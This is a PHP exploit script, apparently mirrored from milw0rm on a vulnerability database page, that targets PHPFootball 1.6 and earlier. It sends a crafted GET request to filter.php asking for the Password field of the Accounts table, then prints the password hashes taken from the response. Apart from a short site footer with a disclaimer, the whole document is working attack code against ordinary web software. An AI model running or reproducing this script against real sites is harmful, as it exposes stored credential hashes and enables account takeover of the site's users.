<?php // http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip $host = $argv[1]; $path = $argv[2]; if ($argc != 3) { echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n"; echo "by KinG-LioN - http://eurohackers.it\n"; echo "Usage: php {$argv[0]} <host> <path>\n"; exit; } else { $head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n"; $head .= "Host: {$host}\r\n"; $head .= "Connection: close\r\n\r\n"; $fsock = fsockopen ($host,80); fputs ($fsock,$head); while (!feof($fsock)) { $cont .= fgets($fsock); } fclose($fsock); if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) { print_r($i[1]); } else { die ("exploit error\n"); } } ?> # milw0rm.com [2009-01-01]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论